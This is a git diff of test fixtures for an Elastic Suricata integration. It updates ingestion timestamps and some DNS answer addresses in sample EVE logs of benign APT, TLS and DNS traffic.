"{\"timestamp\":\"2018-10-04T09:34:59.009897+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1138},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":497,\"bytes_toclient\":1654,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -795,7 +795,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312651100Z", + "ingested": "2021-12-09T13:45:19.996669800Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.168340+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":304,\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":487,\"bytes_toclient\":417,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -899,7 +899,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312657800Z", + "ingested": "2021-12-09T13:45:19.996675700Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.288862+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":1,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2601},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":842,\"bytes_toclient\":3445,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1003,7 +1003,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312664900Z", + "ingested": "2021-12-09T13:45:19.996681500Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.289324+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":1,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/main\\/source\\/by-hash\\/SHA256\\/f5ec03d97ca76c98162d9233c8b7c578c52897e2136428277baf2e7b633a8e72\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1241},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":64,\"pkts_toclient\":62,\"bytes_toserver\":4810,\"bytes_toclient\":90543,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1107,7 +1107,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312670200Z", + "ingested": "2021-12-09T13:45:19.996687400Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.356132+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":2,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/main\\/binary-amd64\\/by-hash\\/SHA256\\/c5b8346a3221bc9a23a79ba4dc4e730a6319a77fc9d63872dfc56539a0810015\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":87,\"pkts_toclient\":98,\"bytes_toserver\":6591,\"bytes_toclient\":145014,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1211,7 +1211,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312675300Z", + "ingested": "2021-12-09T13:45:19.996693700Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.456919+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":3,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/universe\\/binary-amd64\\/by-hash\\/SHA256\\/e5cc957139a25a0fee47cbf2c0fac8ad5cab50346d6a74abe031748924c5b558\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2688},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":156,\"pkts_toclient\":221,\"bytes_toserver\":11460,\"bytes_toclient\":330525,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1315,7 +1315,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312680Z", + "ingested": "2021-12-09T13:45:19.996699600Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.747122+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":2,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-backports\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2601},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":64,\"pkts_toclient\":67,\"bytes_toserver\":4895,\"bytes_toclient\":96554,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1419,7 +1419,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312684700Z", + "ingested": "2021-12-09T13:45:19.996705700Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.953886+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":3,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/main\\/source\\/by-hash\\/SHA256\\/65f2e3a4e9d89d9d4b5e3d42e586bc96f48a24466b0ad0b4a707255e44a26b03\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":91,\"pkts_toclient\":119,\"bytes_toserver\":6932,\"bytes_toclient\":174843,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1523,7 +1523,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312689300Z", + "ingested": "2021-12-09T13:45:19.996711700Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.250560+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":4,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/source\\/by-hash\\/SHA256\\/56cfd9cc2efa61dff7428dddf921c3cd6047ab8e6484a7f1888e4c3f7252f1ef\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2688},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":159,\"pkts_toclient\":253,\"bytes_toserver\":11679,\"bytes_toclient\":376452,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1627,7 +1627,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312693700Z", + "ingested": "2021-12-09T13:45:19.996715200Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.401788+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":5,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/main\\/binary-amd64\\/by-hash\\/SHA256\\/4360137dc8f98b47648da1fef5472ef234fb02115bc2b29873bcaeee62637e70\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":190,\"pkts_toclient\":314,\"bytes_toserver\":13986,\"bytes_toclient\":468170,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1731,7 +1731,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312697900Z", + "ingested": "2021-12-09T13:45:19.996720200Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.776438+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":6,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/restricted\\/binary-amd64\\/by-hash\\/SHA256\\/c93fdc7f10cad1263349fd7b5bdd6a7f7163165b96ad263b3e12022e319d0d12\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2691},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":328,\"pkts_toclient\":588,\"bytes_toserver\":23361,\"bytes_toclient\":880323,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1835,7 +1835,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312702200Z", + "ingested": "2021-12-09T13:45:19.996725700Z", "original": "{\"timestamp\":\"2018-10-04T09:35:00.897009+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":7,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/binary-amd64\\/by-hash\\/SHA256\\/5190f7afbee38b3cb32225db478fdbabd46f76eaa9c5921a13091891bf3e9bbc\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":330,\"pkts_toclient\":591,\"bytes_toserver\":23758,\"bytes_toclient\":884342,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1938,7 +1938,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312707200Z", + "ingested": "2021-12-09T13:45:19.996731200Z", "original": "{\"timestamp\":\"2018-10-04T09:35:01.362208+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":8,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/universe\\/i18n\\/by-hash\\/SHA256\\/9fe539b7036e51327cd85ca5e0a4dd4eb47f69168875de2ac9842a5e36ebd4a4\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":524,\"pkts_toclient\":979,\"bytes_toserver\":36819,\"bytes_toclient\":1467603,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -2041,7 +2041,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312711600Z", + "ingested": "2021-12-09T13:45:19.996735400Z", "original": "{\"timestamp\":\"2018-10-04T09:35:01.575088+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":9,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/multiverse\\/binary-amd64\\/by-hash\\/SHA256\\/8ab8cb220c0e50521c589acc2bc2b43a3121210f0b035a0605972bcffd73dd16\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":575,\"pkts_toclient\":1079,\"bytes_toserver\":40452,\"bytes_toclient\":1618380,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -2157,7 +2157,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-05T10:52:43.312715800Z", + "ingested": "2021-12-09T13:45:19.996740100Z", "original": "{\"tls\":{\"ja3s\":{\"string\":\"333,55555,66666-22\",\"hash\":\"0993626a07ad09e1ce91293be7aa5721\"},\"ja3\":{\"string\":\"001,22222-33333-00-44444-66666-333-333-55555-55555-22-55555-44444-22-33-66666-77777-22-88888-99999-333-22-66666-77777-22-99999-96611-22-33-88888-33333-88888-333-22222-33333-333-222-88888-444-99999-22222-666-777-888,22-33-44-55-6,77-88-99-0-11-11-22-33-44-55,0\",\"hash\":\"d92325c876e7279f4eb8c62415e3a6b7\"},\"notafter\":\"2024-07-16T14:52:35\",\"notbefore\":\"2019-07-17T14:52:35\",\"version\":\"TLS 1.2\",\"sni\":\"hostname.domain.net\",\"fingerprint\":\"00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00:11:22:33\",\"serial\":\"00:11:22:33:44:55:66:77:88\",\"issuerdn\":\"C=US, O=Google Inc, CN=Google Internet Authority G2\",\"subject\":\"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com\"},\"proto\":\"TCP\",\"dest_port\":9080,\"dest_ip\":\"10.232.0.237\",\"src_port\":45884,\"src_ip\":\"10.126.2.140\",\"event_type\":\"tls\",\"in_iface\":\"enp5s0\",\"flow_id\":1091813059495729,\"timestamp\":\"2018-10-04T09:35:02.796615+0000\"}", "category": [ "network" @@ -2284,7 +2284,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-05T10:52:43.312719800Z", + "ingested": "2021-12-09T13:45:19.996745900Z", "original": "{\"flow\":{\"start\":\"2020-06-26T11:00:02.970011-0400\",\"bytes_toclient\":4660,\"bytes_toserver\":1074,\"pkts_toclient\":8,\"pkts_toserver\":7},\"app_proto\":\"tls\",\"tls\":{\"ja3s\":{\"string\":\"742,48172,30210-30\",\"hash\":\"391231ba5675e42807b9e1f457b2614e\"},\"ja3\":{\"string\":\"718,4682-2687-2686-41992-41911-53292-53297-41969-22905-41926-41924-94181-94711-15-23-95-12-11-205,0-33-50-53-6-61-39-23-34-85-81,93-04-52,3-9-3\",\"hash\":\"3f1ea03f5822e8021b60cc3e4b233181\"},\"notafter\":\"2026-06-25T17:36:29\",\"notbefore\":\"2016-06-27T17:36:29\",\"version\":\"TLS 1.2\",\"sni\":\"host.domain.net\",\"fingerprint\":\"36:3f:ee:2a:1c:fa:de:ad:be:ef:42:99:cf:a9:b0:91:01:eb:a9:cc\",\"serial\":\"72:A9:2C:51\",\"issuerdn\":\"C=Unknown, ST=Unknown, L=Unknown, O=Unknown, OU=Unknown, CN=Unknown\",\"subject\":\"C=Unknown, ST=Unknown, L=Unknown, O=Unknown, OU=Unknown, CN=Unknown\"},\"alert\":{\"severity\":3,\"category\":\"\",\"signature\":\"SURICATA TLS on unusual port\",\"rev\":1,\"signature_id\":2610003,\"gid\":1,\"action\":\"allowed\"},\"proto\":\"TCP\",\"dest_port\":8443,\"dest_ip\":\"10.128.2.48\",\"src_port\":64389,\"src_ip\":\"10.137.3.54\",\"event_type\":\"alert\",\"in_iface\":\"enp0s31f6\",\"flow_id\":991192778198299,\"timestamp\":\"2020-06-26T11:00:03.342282-0400\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log index 4f625ae98f8..9f38719e12d 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-dns-4-1-4.log @@ -1,24 +1,24 @@ {"timestamp":"2019-08-22T23:48:27.924120+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":46686,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51803,"rrname":"google.com","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-22T23:48:27.924282+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":36993,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39523,"rrname":"google.com","rrtype":"AAAA","tx_id":0}} -{"timestamp":"2019-08-22T23:48:27.950946+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":36993,"proto":"UDP","dns":{"version":2,"type":"answer","id":39523,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"AAAA","answers":[{"rrname":"google.com","rrtype":"AAAA","ttl":272,"rdata":"2607:f8b0:4006:0805:0000:0000:0000:200e"}],"grouped":{"AAAA":["2607:f8b0:4006:0805:0000:0000:0000:200e"]}}} -{"timestamp":"2019-08-22T23:48:27.957906+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":46686,"proto":"UDP","dns":{"version":2,"type":"answer","id":51803,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"A","answers":[{"rrname":"google.com","rrtype":"A","ttl":299,"rdata":"172.217.11.46"}],"grouped":{"A":["172.217.11.46"]}}} +{"timestamp":"2019-08-22T23:48:27.950946+0000","flow_id":1418448010418810,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":36993,"proto":"UDP","dns":{"version":2,"type":"answer","id":39523,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"AAAA","answers":[{"rrname":"google.com","rrtype":"AAAA","ttl":272,"rdata":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"}],"grouped":{"AAAA":["2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"]}}} +{"timestamp":"2019-08-22T23:48:27.957906+0000","flow_id":885455453886936,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":46686,"proto":"UDP","dns":{"version":2,"type":"answer","id":51803,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"google.com","rrtype":"A","answers":[{"rrname":"google.com","rrtype":"A","ttl":299,"rdata":"175.16.199.1"}],"grouped":{"A":["175.16.199.1"]}}} {"timestamp":"2019-08-22T23:48:48.839495+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":50720,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60273,"rrname":"www.elastic.co","rrtype":"A","tx_id":0}} {"timestamp":"2019-08-22T23:48:48.839714+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.15","src_port":41979,"dest_ip":"10.0.2.3","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4210,"rrname":"www.elastic.co","rrtype":"AAAA","tx_id":0}} -{"timestamp":"2019-08-22T23:48:48.901548+0000","flow_id":40074894954311,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":50720,"proto":"UDP","dns":{"version":2,"type":"answer","id":60273,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"A","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":270,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.130.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.194.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.2.217"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"A","ttl":29,"rdata":"151.101.66.217"}],"grouped":{"A":["151.101.130.217","151.101.194.217","151.101.2.217","151.101.66.217"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} -{"timestamp":"2019-08-22T23:48:48.902685+0000","flow_id":2130691028471842,"in_iface":"enp0s3","event_type":"dns","src_ip":"10.0.2.3","src_port":53,"dest_ip":"10.0.2.15","dest_port":41979,"proto":"UDP","dns":{"version":2,"type":"answer","id":4210,"flags":"8180","qr":true,"rd":true,"ra":true,"rcode":"NOERROR","rrname":"www.elastic.co","rrtype":"AAAA","answers":[{"rrname":"www.elastic.co","rrtype":"CNAME","ttl":299,"rdata":"dualstack.r2.shared.global.fastly.net"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0600:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0000:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0200:0000:0000:0000:0000:0729"},{"rrname":"dualstack.r2.shared.global.fastly.net","rrtype":"AAAA","ttl":29,"rdata":"2a04:4e42:0400:0000:0000:0000:0000:0729"}],"grouped":{"AAAA":["2a04:4e42:0600:0000:0000:0000:0000:0729","2a04:4e42:0000:0000:0000:0000:0000:0729","2a04:4e42:0200:0000:0000:0000:0000:0729","2a04:4e42:0400:0000:0000:0000:0000:0729"],"CNAME":["dualstack.r2.shared.global.fastly.net"]}}} 